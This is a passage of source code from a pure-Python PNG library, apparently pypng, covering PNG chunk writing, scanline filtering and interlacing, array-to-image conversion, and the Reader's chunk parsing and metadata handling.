p,t = self.make_palette()
write_chunk(outfile, b'PLTE', p)
if t:
# tRNS chunk is optional. Only needed if palette entries
# have alpha.
write_chunk(outfile, b'tRNS', t)
# http://www.w3.org/TR/PNG/#11tRNS
if self.transparent is not None:
if self.greyscale:
write_chunk(outfile, b'tRNS',
struct.pack("!1H", *self.transparent))
else:
write_chunk(outfile, b'tRNS',
struct.pack("!3H", *self.transparent))
# http://www.w3.org/TR/PNG/#11bKGD
if self.background is not None:
if self.greyscale:
write_chunk(outfile, b'bKGD',
struct.pack("!1H", *self.background))
else:
write_chunk(outfile, b'bKGD',
struct.pack("!3H", *self.background))
# http://www.w3.org/TR/PNG/#11pHYs
if self.x_pixels_per_unit is not None and self.y_pixels_per_unit is not None:
tup = (self.x_pixels_per_unit, self.y_pixels_per_unit, int(self.unit_is_meter))
write_chunk(outfile, b'pHYs', struct.pack("!LLB",*tup))
# http://www.w3.org/TR/PNG/#11IDAT
if self.compression is not None:
compressor = zlib.compressobj(self.compression)
else:
compressor = zlib.compressobj()
# Choose an extend function based on the bitdepth. The extend
# function packs/decomposes the pixel values into bytes and
# stuffs them onto the data array.
data = array('B')
if self.bitdepth == 8 or packed:
extend = data.extend
elif self.bitdepth == 16:
# Decompose into bytes
def extend(sl):
fmt = '!%dH' % len(sl)
data.extend(array('B', struct.pack(fmt, *sl)))
else:
# Pack into bytes
assert self.bitdepth < 8
# samples per byte
spb = int(8/self.bitdepth)
def extend(sl):
a = array('B', sl)
# Adding padding bytes so we can group into a whole
# number of spb-tuples.
l = float(len(a))
extra = math.ceil(l / float(spb))*spb - l
a.extend([0]*int(extra))
# Pack into bytes
l = group(a, spb)
l = [reduce(lambda x,y:
(x << self.bitdepth) + y, e) for e in l]
data.extend(l)
if self.rescale:
oldextend = extend
factor = \
float(2**self.rescale[1]-1) / float(2**self.rescale[0]-1)
def extend(sl):
oldextend([int(round(factor*x)) for x in sl])
# Build the first row, testing mostly to see if we need to
# changed the extend function to cope with NumPy integer types
# (they cause our ordinary definition of extend to fail, so we
# wrap it). See
# http://code.google.com/p/pypng/issues/detail?id=44
enumrows = enumerate(rows)
del rows
# First row's filter type.
data.append(0)
# :todo: Certain exceptions in the call to ``.next()`` or the
# following try would indicate no row data supplied.
# Should catch.
i,row = next(enumrows)
try:
# If this fails...
extend(row)
except:
# ... try a version that converts the values to int first.
# Not only does this work for the (slightly broken) NumPy
# types, there are probably lots of other, unknown, "nearly"
# int types it works for.
def wrapmapint(f):
return lambda sl: f([int(x) for x in sl])
extend = wrapmapint(extend)
del wrapmapint
extend(row)
for i,row in enumrows:
# Add "None" filter type. Currently, it's essential that
# this filter type be used for every scanline as we do not
# mark the first row of a reduced pass image; that means we
# could accidentally compute the wrong filtered scanline if
# we used "up", "average", or "paeth" on such a line.
data.append(0)
extend(row)
if len(data) > self.chunk_limit:
compressed = compressor.compress(tostring(data))
if len(compressed):
write_chunk(outfile, b'IDAT', compressed)
# Because of our very witty definition of ``extend``,
# above, we must re-use the same ``data`` object. Hence
# we use ``del`` to empty this one, rather than create a
# fresh one (which would be my natural FP instinct).
del data[:]
if len(data):
compressed = compressor.compress(tostring(data))
else:
compressed = b''
flushed = compressor.flush()
if len(compressed) or len(flushed):
write_chunk(outfile, b'IDAT', compressed + flushed)
# http://www.w3.org/TR/PNG/#11IEND
write_chunk(outfile, b'IEND')
return i+1
def write_array(self, outfile, pixels):
"""
Write an array in flat row flat pixel format as a PNG file on
the output file. See also :meth:`write` method.
"""
if self.interlace:
self.write_passes(outfile, self.array_scanlines_interlace(pixels))
else:
self.write_passes(outfile, self.array_scanlines(pixels))
def write_packed(self, outfile, rows):
"""
Write PNG file to `outfile`. The pixel data comes from `rows`
which should be in boxed row packed format. Each row should be
a sequence of packed bytes.
Technically, this method does work for interlaced images but it
is best avoided. For interlaced images, the rows should be
presented in the order that they appear in the file.
This method should not be used when the source image bit depth
is not one naturally supported by PNG; the bit depth should be
1, 2, 4, 8, or 16.
"""
if self.rescale:
raise Error("write_packed method not suitable for bit depth %d" %
self.rescale[0])
return self.write_passes(outfile, rows, packed=True)
def convert_pnm(self, infile, outfile):
"""
Convert a PNM file containing raw pixel data into a PNG file
with the parameters set in the writer object. Works for
(binary) PGM, PPM, and PAM formats.
"""
if self.interlace:
pixels = array('B')
pixels.fromfile(infile,
(self.bitdepth/8) * self.color_planes *
self.width * self.height)
self.write_passes(outfile, self.array_scanlines_interlace(pixels))
else:
self.write_passes(outfile, self.file_scanlines(infile))
def convert_ppm_and_pgm(self, ppmfile, pgmfile, outfile):
"""
Convert a PPM and PGM file containing raw pixel data into a
PNG outfile with the parameters set in the writer object.
"""
pixels = array('B')
pixels.fromfile(ppmfile,
(self.bitdepth/8) * self.color_planes *
self.width * self.height)
apixels = array('B')
apixels.fromfile(pgmfile,
(self.bitdepth/8) *
self.width * self.height)
pixels = interleave_planes(pixels, apixels,
(self.bitdepth/8) * self.color_planes,
(self.bitdepth/8))
if self.interlace:
self.write_passes(outfile, self.array_scanlines_interlace(pixels))
else:
self.write_passes(outfile, self.array_scanlines(pixels))
def file_scanlines(self, infile):
"""
Generates boxed rows in flat pixel format, from the input file
`infile`. It assumes that the input file is in a "Netpbm-like"
binary format, and is positioned at the beginning of the first
pixel. The number of pixels to read is taken from the image
dimensions (`width`, `height`, `planes`) and the number of bytes
per value is implied by the image `bitdepth`.
"""
# Values per row
vpr = self.width * self.planes
row_bytes = vpr
if self.bitdepth > 8:
assert self.bitdepth == 16
row_bytes *= 2
fmt = '>%dH' % vpr
def line():
return array('H', struct.unpack(fmt, infile.read(row_bytes)))
else:
def line():
scanline = array('B', infile.read(row_bytes))
return scanline
for y in range(self.height):
yield line()
def array_scanlines(self, pixels):
"""
Generates boxed rows (flat pixels) from flat rows (flat pixels)
in an array.
"""
# Values per row
vpr = self.width * self.planes
stop = 0
for y in range(self.height):
start = stop
stop = start + vpr
yield pixels[start:stop]
def array_scanlines_interlace(self, pixels):
"""
Generator for interlaced scanlines from an array. `pixels` is
the full source image in flat row flat pixel format. The
generator yields each scanline of the reduced passes in turn, in
boxed row flat pixel format.
"""
# http://www.w3.org/TR/PNG/#8InterlaceMethods
# Array type.
fmt = 'BH'[self.bitdepth > 8]
# Value per row
vpr = self.width * self.planes
for xstart, ystart, xstep, ystep in _adam7:
if xstart >= self.width:
continue
# Pixels per row (of reduced image)
ppr = int(math.ceil((self.width-xstart)/float(xstep)))
# number of values in reduced image row.
row_len = ppr*self.planes
for y in range(ystart, self.height, ystep):
if xstep == 1:
offset = y * vpr
yield pixels[offset:offset+vpr]
else:
row = array(fmt)
# There's no easier way to set the length of an array
row.extend(pixels[0:row_len])
offset = y * vpr + xstart * self.planes
end_offset = (y+1) * vpr
skip = self.planes * xstep
for i in range(self.planes):
row[i::self.planes] = \
pixels[offset+i:end_offset:skip]
yield row
def write_chunk(outfile, tag, data=b''):
"""
Write a PNG chunk to the output file, including length and
checksum.
"""
# http://www.w3.org/TR/PNG/#5Chunk-layout
outfile.write(struct.pack("!I", len(data)))
outfile.write(tag)
outfile.write(data)
checksum = zlib.crc32(tag)
checksum = zlib.crc32(data, checksum)
checksum &= 2**32-1
outfile.write(struct.pack("!I", checksum))
def write_chunks(out, chunks):
"""Create a PNG file by writing out the chunks."""
out.write(_signature)
for chunk in chunks:
write_chunk(out, *chunk)
def filter_scanline(type, line, fo, prev=None):
"""Apply a scanline filter to a scanline. `type` specifies the
filter type (0 to 4); `line` specifies the current (unfiltered)
scanline as a sequence of bytes; `prev` specifies the previous
(unfiltered) scanline as a sequence of bytes. `fo` specifies the
filter offset; normally this is size of a pixel in bytes (the number
of bytes per sample times the number of channels), but when this is
< 1 (for bit depths < 8) then the filter offset is 1.
"""
assert 0 <= type < 5
# The output array. Which, pathetically, we extend one-byte at a
# time (fortunately this is linear).
out = array('B', [type])
def sub():
ai = -fo
for x in line:
if ai >= 0:
x = (x - line[ai]) & 0xff
out.append(x)
ai += 1
def up():
for i,x in enumerate(line):
x = (x - prev[i]) & 0xff
out.append(x)
def average():
ai = -fo
for i,x in enumerate(line):
if ai >= 0:
x = (x - ((line[ai] + prev[i]) >> 1)) & 0xff
else:
x = (x - (prev[i] >> 1)) & 0xff
out.append(x)
ai += 1
def paeth():
# http://www.w3.org/TR/PNG/#9Filter-type-4-Paeth
ai = -fo # also used for ci
for i,x in enumerate(line):
a = 0
b = prev[i]
c = 0
if ai >= 0:
a = line[ai]
c = prev[ai]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
Pr = a
elif pb <= pc:
Pr = b
else:
Pr = c
x = (x - Pr) & 0xff
out.append(x)
ai += 1
if not prev:
# We're on the first line. Some of the filters can be reduced
# to simpler cases which makes handling the line "off the top"
# of the image simpler. "up" becomes "none"; "paeth" becomes
# "left" (non-trivial, but true). "average" needs to be handled
# specially.
if type == 2: # "up"
type = 0
elif type == 3:
prev = [0]*len(line)
elif type == 4: # "paeth"
type = 1
if type == 0:
out.extend(line)
elif type == 1:
sub()
elif type == 2:
up()
elif type == 3:
average()
else: # type == 4
paeth()
return out
def from_array(a, mode=None, info={}):
"""Create a PNG :class:`Image` object from a 2- or 3-dimensional
array. One application of this function is easy PIL-style saving:
``png.from_array(pixels, 'L').save('foo.png')``.
Unless they are specified using the *info* parameter, the PNG's
height and width are taken from the array size. For a 3 dimensional
array the first axis is the height; the second axis is the width;
and the third axis is the channel number. Thus an RGB image that is
16 pixels high and 8 wide will use an array that is 16x8x3. For 2
dimensional arrays the first axis is the height, but the second axis
is ``width*channels``, so an RGB image that is 16 pixels high and 8
wide will use a 2-dimensional array that is 16x24 (each row will be
8*3 = 24 sample values).
*mode* is a string that specifies the image colour format in a
PIL-style mode. It can be:
``'L'``
greyscale (1 channel)
``'LA'``
greyscale with alpha (2 channel)
``'RGB'``
colour image (3 channel)
``'RGBA'``
colour image with alpha (4 channel)
The mode string can also specify the bit depth (overriding how this
function normally derives the bit depth, see below). Appending
``';16'`` to the mode will cause the PNG to be 16 bits per channel;
any decimal from 1 to 16 can be used to specify the bit depth.
When a 2-dimensional array is used *mode* determines how many
channels the image has, and so allows the width to be derived from
the second array dimension.
The array is expected to be a ``numpy`` array, but it can be any
suitable Python sequence. For example, a list of lists can be used:
``png.from_array([[0, 255, 0], [255, 0, 255]], 'L')``. The exact
rules are: ``len(a)`` gives the first dimension, height;
``len(a[0])`` gives the second dimension; ``len(a[0][0])`` gives the
third dimension, unless an exception is raised in which case a
2-dimensional array is assumed. It's slightly more complicated than
that because an iterator of rows can be used, and it all still
works. Using an iterator allows data to be streamed efficiently.
The bit depth of the PNG is normally taken from the array element's
datatype (but if *mode* specifies a bitdepth then that is used
instead). The array element's datatype is determined in a way which
is supposed to work both for ``numpy`` arrays and for Python
``array.array`` objects. A 1 byte datatype will give a bit depth of
8, a 2 byte datatype will give a bit depth of 16. If the datatype
does not have an implicit size, for example it is a plain Python
list of lists, as above, then a default of 8 is used.
The *info* parameter is a dictionary that can be used to specify
metadata (in the same style as the arguments to the
:class:`png.Writer` class). For this function the keys that are
useful are:
height
overrides the height derived from the array dimensions and allows
*a* to be an iterable.
width
overrides the width derived from the array dimensions.
bitdepth
overrides the bit depth derived from the element datatype (but
must match *mode* if that also specifies a bit depth).
Generally anything specified in the
*info* dictionary will override any implicit choices that this
function would otherwise make, but must match any explicit ones.
For example, if the *info* dictionary has a ``greyscale`` key then
this must be true when mode is ``'L'`` or ``'LA'`` and false when
mode is ``'RGB'`` or ``'RGBA'``.
"""
# We abuse the *info* parameter by modifying it. Take a copy here.
# (Also typechecks *info* to some extent).
info = dict(info)
# Syntax check mode string.
bitdepth = None
try:
# Assign the 'L' or 'RGBA' part to `gotmode`.
if mode.startswith('L'):
gotmode = 'L'
mode = mode[1:]
elif mode.startswith('RGB'):
gotmode = 'RGB'
mode = mode[3:]
else:
raise Error()
if mode.startswith('A'):
gotmode += 'A'
mode = mode[1:]
# Skip any optional ';'
while mode.startswith(';'):
mode = mode[1:]
# Parse optional bitdepth
if mode:
try:
bitdepth = int(mode)
except (TypeError, ValueError):
raise Error()
except Error:
raise Error("mode string should be 'RGB' or 'L;16' or similar.")
mode = gotmode
# Get bitdepth from *mode* if possible.
if bitdepth:
if info.get('bitdepth') and bitdepth != info['bitdepth']:
raise Error("mode bitdepth (%d) should match info bitdepth (%d)." %
(bitdepth, info['bitdepth']))
info['bitdepth'] = bitdepth
# Fill in and/or check entries in *info*.
# Dimensions.
if 'size' in info:
# Check width, height, size all match where used.
for dimension,axis in [('width', 0), ('height', 1)]:
if dimension in info:
if info[dimension] != info['size'][axis]:
raise Error(
"info[%r] should match info['size'][%r]." %
(dimension, axis))
info['width'],info['height'] = info['size']
if 'height' not in info:
try:
l = len(a)
except TypeError:
raise Error(
"len(a) does not work, supply info['height'] instead.")
info['height'] = l
# Colour format.
if 'greyscale' in info:
if bool(info['greyscale']) != ('L' in mode):
raise Error("info['greyscale'] should match mode.")
info['greyscale'] = 'L' in mode
if 'alpha' in info:
if bool(info['alpha']) != ('A' in mode):
raise Error("info['alpha'] should match mode.")
info['alpha'] = 'A' in mode
planes = len(mode)
if 'planes' in info:
if info['planes'] != planes:
raise Error("info['planes'] should match mode.")
# In order to work out whether we the array is 2D or 3D we need its
# first row, which requires that we take a copy of its iterator.
# We may also need the first row to derive width and bitdepth.
a,t = itertools.tee(a)
row = next(t)
del t
try:
row[0][0]
threed = True
testelement = row[0]
except (IndexError, TypeError):
threed = False
testelement = row
if 'width' not in info:
if threed:
width = len(row)
else:
width = len(row) // planes
info['width'] = width
if threed:
# Flatten the threed rows
a = (itertools.chain.from_iterable(x) for x in a)
if 'bitdepth' not in info:
try:
dtype = testelement.dtype
# goto the "else:" clause. Sorry.
except AttributeError:
try:
# Try a Python array.array.
bitdepth = 8 * testelement.itemsize
except AttributeError:
# We can't determine it from the array element's
# datatype, use a default of 8.
bitdepth = 8
else:
# If we got here without exception, we now assume that
# the array is a numpy array.
if dtype.kind == 'b':
bitdepth = 1
else:
bitdepth = 8 * dtype.itemsize
info['bitdepth'] = bitdepth
for thing in 'width height bitdepth greyscale alpha'.split():
assert thing in info
return Image(a, info)
# So that refugee's from PIL feel more at home. Not documented.
fromarray = from_array
class Image:
"""A PNG image. You can create an :class:`Image` object from
an array of pixels by calling :meth:`png.from_array`. It can be
saved to disk with the :meth:`save` method.
"""
def __init__(self, rows, info):
"""
.. note ::
The constructor is not public. Please do not call it.
"""
self.rows = rows
self.info = info
def save(self, file):
"""Save the image to *file*. If *file* looks like an open file
descriptor then it is used, otherwise it is treated as a
filename and a fresh file is opened.
In general, you can only call this method once; after it has
been called the first time and the PNG image has been saved, the
source data will have been streamed, and cannot be streamed
again.
"""
w = Writer(**self.info)
try:
file.write
def close(): pass
except AttributeError:
file = open(file, 'wb')
def close(): file.close()
try:
w.write(file, self.rows)
finally:
close()
class _readable:
"""
A simple file-like interface for strings and arrays.
"""
def __init__(self, buf):
self.buf = buf
self.offset = 0
def read(self, n):
r = self.buf[self.offset:self.offset+n]
if isarray(r):
r = r.tostring()
self.offset += n
return r
try:
str(b'dummy', 'ascii')
except TypeError:
as_str = str
else:
def as_str(x):
return str(x, 'ascii')
class Reader:
"""
PNG decoder in pure Python.
"""
def __init__(self, _guess=None, **kw):
"""
Create a PNG decoder object.
The constructor expects exactly one keyword argument. If you
supply a positional argument instead, it will guess the input
type. You can choose among the following keyword arguments:
filename
Name of input file (a PNG file).
file
A file-like object (object with a read() method).
bytes
``array`` or ``string`` with PNG data.
"""
if ((_guess is not None and len(kw) != 0) or
(_guess is None and len(kw) != 1)):
raise TypeError("Reader() takes exactly 1 argument")
# Will be the first 8 bytes, later on. See validate_signature.
self.signature = None
self.transparent = None
# A pair of (len,type) if a chunk has been read but its data and
# checksum have not (in other words the file position is just
# past the 4 bytes that specify the chunk type). See preamble
# method for how this is used.
self.atchunk = None
if _guess is not None:
if isarray(_guess):
kw["bytes"] = _guess
elif isinstance(_guess, str):
kw["filename"] = _guess
elif hasattr(_guess, 'read'):
kw["file"] = _guess
if "filename" in kw:
self.file = open(kw["filename"], "rb")
elif "file" in kw:
self.file = kw["file"]
elif "bytes" in kw:
self.file = _readable(kw["bytes"])
else:
raise TypeError("expecting filename, file or bytes array")
def chunk(self, seek=None, lenient=False):
"""
Read the next PNG chunk from the input file; returns a
(*type*, *data*) tuple. *type* is the chunk's type as a
byte string (all PNG chunk types are 4 bytes long).
*data* is the chunk's data content, as a byte string.
If the optional `seek` argument is
specified then it will keep reading chunks until it either runs
out of file or finds the type specified by the argument. Note
that in general the order of chunks in PNGs is unspecified, so
using `seek` can cause you to miss chunks.
If the optional `lenient` argument evaluates to `True`,
checksum failures will raise warnings rather than exceptions.
"""
self.validate_signature()
while True:
# http://www.w3.org/TR/PNG/#5Chunk-layout
if not self.atchunk:
self.atchunk = self.chunklentype()
length, type = self.atchunk
self.atchunk = None
data = self.file.read(length)
if len(data) != length:
raise ChunkError('Chunk %s too short for required %i octets.'
% (type, length))
checksum = self.file.read(4)
if len(checksum) != 4:
raise ChunkError('Chunk %s too short for checksum.' % type)
if seek and type != seek:
continue
verify = zlib.crc32(type)
verify = zlib.crc32(data, verify)
# Whether the output from zlib.crc32 is signed or not varies
# according to hideous implementation details, see
# http://bugs.python.org/issue1202 .
# We coerce it to be positive here (in a way which works on
# Python 2.3 and older).
verify &= 2**32 - 1
verify = struct.pack('!I', verify)
if checksum != verify:
(a, ) = struct.unpack('!I', checksum)
(b, ) = struct.unpack('!I', verify)
message = "Checksum error in %s chunk: 0x%08X != 0x%08X." % (type, a, b)
if lenient:
warnings.warn(message, RuntimeWarning)
else:
raise ChunkError(message)
return type, data
def chunks(self):
"""Return an iterator that will yield each chunk as a
(*chunktype*, *content*) pair.
"""
while True:
t,v = self.chunk()
yield t,v
if t == b'IEND':
break
def undo_filter(self, filter_type, scanline, previous):
"""Undo the filter for a scanline. `scanline` is a sequence of
bytes that does not include the initial filter type byte.
`previous` is decoded previous scanline (for straightlaced
images this is the previous pixel row, but for interlaced
images, it is the previous scanline in the reduced image, which
in general is not the previous pixel row in the final image).
When there is no previous scanline (the first row of a
straightlaced image, or the first row in one of the passes in an
interlaced image), then this argument should be ``None``.
The scanline will have the effects of filtering removed, and the
result will be returned as a fresh sequence of bytes.
"""
# :todo: Would it be better to update scanline in place?
# Yes, with the Cython extension making the undo_filter fast,
# updating scanline inplace makes the code 3 times faster
# (reading 50 images of 800x800 went from 40s to 16s)
result = scanline
if filter_type == 0:
return result
if filter_type not in (1,2,3,4):
raise FormatError('Invalid PNG Filter Type.'
' See http://www.w3.org/TR/2003/REC-PNG-20031110/#9Filters .')
# Filter unit. The stride from one pixel to the corresponding
# byte from the previous pixel. Normally this is the pixel
# size in bytes, but when this is smaller than 1, the previous
# byte is used instead.
fu = max(1, self.psize)
# For the first line of a pass, synthesize a dummy previous
# line. An alternative approach would be to observe that on the
# first line 'up' is the same as 'null', 'paeth' is the same
# as 'sub', with only 'average' requiring any special case.
if not previous:
previous = array('B', [0]*len(scanline))
def sub():
"""Undo sub filter."""
ai = 0
# Loop starts at index fu. Observe that the initial part
# of the result is already filled in correctly with
# scanline.
for i in range(fu, len(result)):
x = scanline[i]
a = result[ai]
result[i] = (x + a) & 0xff
ai += 1
def up():
"""Undo up filter."""
for i in range(len(result)):
x = scanline[i]
b = previous[i]
result[i] = (x + b) & 0xff
def average():
"""Undo average filter."""
ai = -fu
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = 0
else:
a = result[ai]
b = previous[i]
result[i] = (x + ((a + b) >> 1)) & 0xff
ai += 1
def paeth():
"""Undo Paeth filter."""
# Also used for ci.
ai = -fu
for i in range(len(result)):
x = scanline[i]
if ai < 0:
a = c = 0
else:
a = result[ai]
c = previous[ai]
b = previous[i]
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
pr = a
elif pb <= pc:
pr = b
else:
pr = c
result[i] = (x + pr) & 0xff
ai += 1
# Call appropriate filter algorithm. Note that 0 has already
# been dealt with.
(None,
pngfilters.undo_filter_sub,
pngfilters.undo_filter_up,
pngfilters.undo_filter_average,
pngfilters.undo_filter_paeth)[filter_type](fu, scanline, previous, result)
return result
def deinterlace(self, raw):
"""
Read raw pixel data, undo filters, deinterlace, and flatten.
Return in flat row flat pixel format.
"""
# Values per row (of the target image)
vpr = self.width * self.planes
# Make a result array, and make it big enough. Interleaving
# writes to the output array randomly (well, not quite), so the
# entire output array must be in memory.
fmt = 'BH'[self.bitdepth > 8]
a = array(fmt, [0]*vpr*self.height)
source_offset = 0
for xstart, ystart, xstep, ystep in _adam7:
if xstart >= self.width:
continue
# The previous (reconstructed) scanline. None at the
# beginning of a pass to indicate that there is no previous
# line.
recon = None
# Pixels per row (reduced pass image)
ppr = int(math.ceil((self.width-xstart)/float(xstep)))
# Row size in bytes for this pass.
row_size = int(math.ceil(self.psize * ppr))
for y in range(ystart, self.height, ystep):
filter_type = raw[source_offset]
source_offset += 1
scanline = raw[source_offset:source_offset+row_size]
source_offset += row_size
recon = self.undo_filter(filter_type, scanline, recon)
# Convert so that there is one element per pixel value
flat = self.serialtoflat(recon, ppr)
if xstep == 1:
assert xstart == 0
offset = y * vpr
a[offset:offset+vpr] = flat
else:
offset = y * vpr + xstart * self.planes
end_offset = (y+1) * vpr
skip = self.planes * xstep
for i in range(self.planes):
a[offset+i:end_offset:skip] = \
flat[i::self.planes]
return a
def iterboxed(self, rows):
"""Iterator that yields each scanline in boxed row flat pixel
format. `rows` should be an iterator that yields the bytes of
each row in turn.
"""
def asvalues(raw):
"""Convert a row of raw bytes into a flat row. Result will
be a freshly allocated object, not shared with
argument.
"""
if self.bitdepth == 8:
return array('B', raw)
if self.bitdepth == 16:
raw = tostring(raw)
return array('H', struct.unpack('!%dH' % (len(raw)//2), raw))
assert self.bitdepth < 8
width = self.width
# Samples per byte
spb = 8//self.bitdepth
out = array('B')
mask = 2**self.bitdepth - 1
shifts = [self.bitdepth * i
for i in reversed(list(range(spb)))]
for o in raw:
out.extend([mask&(o>>i) for i in shifts])
return out[:width]
return map(asvalues, rows)
def serialtoflat(self, bytes, width=None):
"""Convert serial format (byte stream) pixel data to flat row
flat pixel.
"""
if self.bitdepth == 8:
return bytes
if self.bitdepth == 16:
bytes = tostring(bytes)
return array('H',
struct.unpack('!%dH' % (len(bytes)//2), bytes))
assert self.bitdepth < 8
if width is None:
width = self.width
# Samples per byte
spb = 8//self.bitdepth
out = array('B')
mask = 2**self.bitdepth - 1
shifts = list(map(self.bitdepth.__mul__, reversed(list(range(spb)))))
l = width
for o in bytes:
out.extend([(mask&(o>>s)) for s in shifts][:l])
l -= spb
if l <= 0:
l = width
return out
def iterstraight(self, raw):
"""Iterator that undoes the effect of filtering, and yields
each row in serialised format (as a sequence of bytes).
Assumes input is straightlaced. `raw` should be an iterable
that yields the raw bytes in chunks of arbitrary size.
"""
# length of row, in bytes
rb = self.row_bytes
a = array('B')
# The previous (reconstructed) scanline. None indicates first
# line of image.
recon = None
for some in raw:
a.extend(some)
while len(a) >= rb + 1:
filter_type = a[0]
scanline = a[1:rb+1]
del a[:rb+1]
recon = self.undo_filter(filter_type, scanline, recon)
yield recon
if len(a) != 0:
# :file:format We get here with a file format error:
# when the available bytes (after decompressing) do not
# pack into exact rows.
raise FormatError(
'Wrong size for decompressed IDAT chunk.')
assert len(a) == 0
def validate_signature(self):
"""If signature (header) has not been read then read and
validate it; otherwise do nothing.
"""
if self.signature:
return
self.signature = self.file.read(8)
if self.signature != _signature:
raise FormatError("PNG file has invalid signature.")
def preamble(self, lenient=False):
"""
Extract the image metadata by reading the initial part of
the PNG file up to the start of the ``IDAT`` chunk. All the
chunks that precede the ``IDAT`` chunk are read and either
processed for metadata or discarded.
If the optional `lenient` argument evaluates to `True`, checksum
failures will raise warnings rather than exceptions.
"""
self.validate_signature()
while True:
if not self.atchunk:
self.atchunk = self.chunklentype()
if self.atchunk is None:
raise FormatError(
'This PNG file has no IDAT chunks.')
if self.atchunk[1] == b'IDAT':
return
self.process_chunk(lenient=lenient)
def chunklentype(self):
"""Reads just enough of the input to determine the next
chunk's length and type, returned as a (*length*, *type*) pair
where *type* is a string. If there are no more chunks, ``None``
is returned.
"""
x = self.file.read(8)
if not x:
return None
if len(x) != 8:
raise FormatError(
'End of file whilst reading chunk length and type.')
length,type = struct.unpack('!I4s', x)
if length > 2**31-1:
raise FormatError('Chunk %s is too large: %d.' % (type,length))
return length,type
def process_chunk(self, lenient=False):
"""Process the next chunk and its data. This only processes the
following chunk types, all others are ignored: ``IHDR``,
``PLTE``, ``bKGD``, ``tRNS``, ``gAMA``, ``sBIT``, ``pHYs``.
If the optional `lenient` argument evaluates to `True`,
checksum failures will raise warnings rather than exceptions.
"""
type, data = self.chunk(lenient=lenient)
method = '_process_' + as_str(type)
m = getattr(self, method, None)
if m:
m(data)
def _process_IHDR(self, data):
# http://www.w3.org/TR/PNG/#11IHDR
if len(data) != 13:
raise FormatError('IHDR chunk has incorrect length.')
(self.width, self.height, self.bitdepth, self.color_type,
self.compression, self.filter,
self.interlace) = struct.unpack("!2I5B", data)
check_bitdepth_colortype(self.bitdepth, self.color_type)
if self.compression != 0:
raise Error("unknown compression method %d" % self.compression)
if self.filter != 0:
raise FormatError("Unknown filter method %d,"
" see http://www.w3.org/TR/2003/REC-PNG-20031110/#9Filters ."
% self.filter)
if self.interlace not in (0,1):
raise FormatError("Unknown interlace method %d,"
" see http://www.w3.org/TR/2003/REC-PNG-20031110/#8InterlaceMethods ."
% self.interlace)
# Derived values
# http://www.w3.org/TR/PNG/#6Colour-values
colormap = bool(self.color_type & 1)
greyscale = not (self.color_type & 2)
alpha = bool(self.color_type & 4)
color_planes = (3,1)[greyscale or colormap]
planes = color_planes + alpha
self.colormap = colormap
self.greyscale = greyscale
self.alpha = alpha
self.color_planes = color_planes
self.planes = planes
self.psize = float(self.bitdepth)/float(8) * planes
if int(self.psize) == self.psize:
self.psize = int(self.psize)
self.row_bytes = int(math.ceil(self.width * self.psize))
# Stores PLTE chunk if present, and is used to check
# chunk ordering constraints.
self.plte = None
# Stores tRNS chunk if present, and is used to check chunk
# ordering constraints.
self.trns = None
# Stores sbit chunk if present.
self.sbit = None
def _process_PLTE(self, data):
# http://www.w3.org/TR/PNG/#11PLTE
if self.plte:
warnings.warn("Multiple PLTE chunks present.")
self.plte = data
if len(data) % 3 != 0:
raise FormatError(
"PLTE chunk's length should be a multiple of 3.")
if len(data) > (2**self.bitdepth)*3:
raise FormatError("PLTE chunk is too long.")
if len(data) == 0:
raise FormatError("Empty PLTE is not allowed.")
def _process_bKGD(self, data):
try:
if self.colormap:
if not self.plte:
warnings.warn(
"PLTE chunk is required before bKGD chunk.")
self.background = struct.unpack('B', data)
else:
self.background = struct.unpack("!%dH" % self.color_planes,
data)
except struct.error:
raise FormatError("bKGD chunk has incorrect length.")
def _process_tRNS(self, data):
# http://www.w3.org/TR/PNG/#11tRNS
self.trns = data
if self.colormap:
if not self.plte:
warnings.warn("PLTE chunk is required before tRNS chunk.")
else:
if len(data) > len(self.plte)/3:
# Was warning, but promoted to Error as it
# would otherwise cause pain later on.
raise FormatError("tRNS chunk is too long.")
else:
if self.alpha:
raise FormatError(
"tRNS chunk is not valid with colour type %d." %
self.color_type)
try:
self.transparent = \
struct.unpack("!%dH" % self.color_planes, data)
except struct.error:
raise FormatError("tRNS chunk has incorrect length.")
def _process_gAMA(self, data):
try:
self.gamma = struct.unpack("!L", data)[0] / 100000.0
except struct.error:
raise FormatError("gAMA chunk has incorrect length.")
def _process_sBIT(self, data):
self.sbit = data
if (self.colormap and len(data) != 3 or
not self.colormap and len(data) != self.planes):
raise FormatError("sBIT chunk has incorrect length.")
def _process_pHYs(self, data):
# http://www.w3.org/TR/PNG/#11pHYs
self.phys = data
fmt = "!LLB"
if len(data) != struct.calcsize(fmt):
raise FormatError("pHYs chunk has incorrect length.")
self.x_pixels_per_unit, self.y_pixels_per_unit, unit = struct.unpack(fmt,data)
self.unit_is_meter = bool(unit)
def read(self, lenient=False):
"""
Read the PNG file and decode it. Returns (`width`, `height`,
`pixels`, `metadata`).
May use excessive memory.
`pixels` are returned in boxed row flat pixel format.
If the optional `lenient` argument evaluates to True,
checksum failures will raise warnings rather than exceptions.
"""
def iteridat():
"""Iterator that yields all the ``IDAT`` chunks as strings."""
while True:
try:
type, data = self.chunk(lenient=lenient)
except ValueError as e:
raise ChunkError(e.args[0])
if type == b'IEND':
# http://www.w3.org/TR/PNG/#11IEND
break
if type != b'IDAT':
continue
# type == b'IDAT'
# http://www.w3.org/TR/PNG/#11IDAT
if self.colormap and not self.plte:
warnings.warn("PLTE chunk is required before IDAT chunk")
yield data
def iterdecomp(idat):
"""Iterator that yields decompressed strings. `idat` should
be an iterator that yields the ``IDAT`` chunk data.
"""
# Currently, with no max_length parameter to decompress,
# this routine will do one yield per IDAT chunk: Not very
# incremental.
d = zlib.decompressobj()
# Each IDAT chunk is passed to the decompressor, then any
# remaining state is decompressed out.
for data in idat:
# :todo: add a max_length argument here to limit output
# size.
yield array('B', d.decompress(data))
yield array('B', d.flush())
self.preamble(lenient=lenient)
raw = iterdecomp(iteridat())
if self.interlace:
raw = array('B', itertools.chain(*raw))
arraycode = 'BH'[self.bitdepth>8]
# Like :meth:`group` but producing an array.array object for
# each row.
pixels = map(lambda *row: array(arraycode, row),
*[iter(self.deinterlace(raw))]*self.width*self.planes)
else:
pixels = self.iterboxed(self.iterstraight(raw))
meta = dict()
for attr in 'greyscale alpha planes bitdepth interlace'.split():
meta[attr] = getattr(self, attr)
meta['size'] = (self.width, self.height)
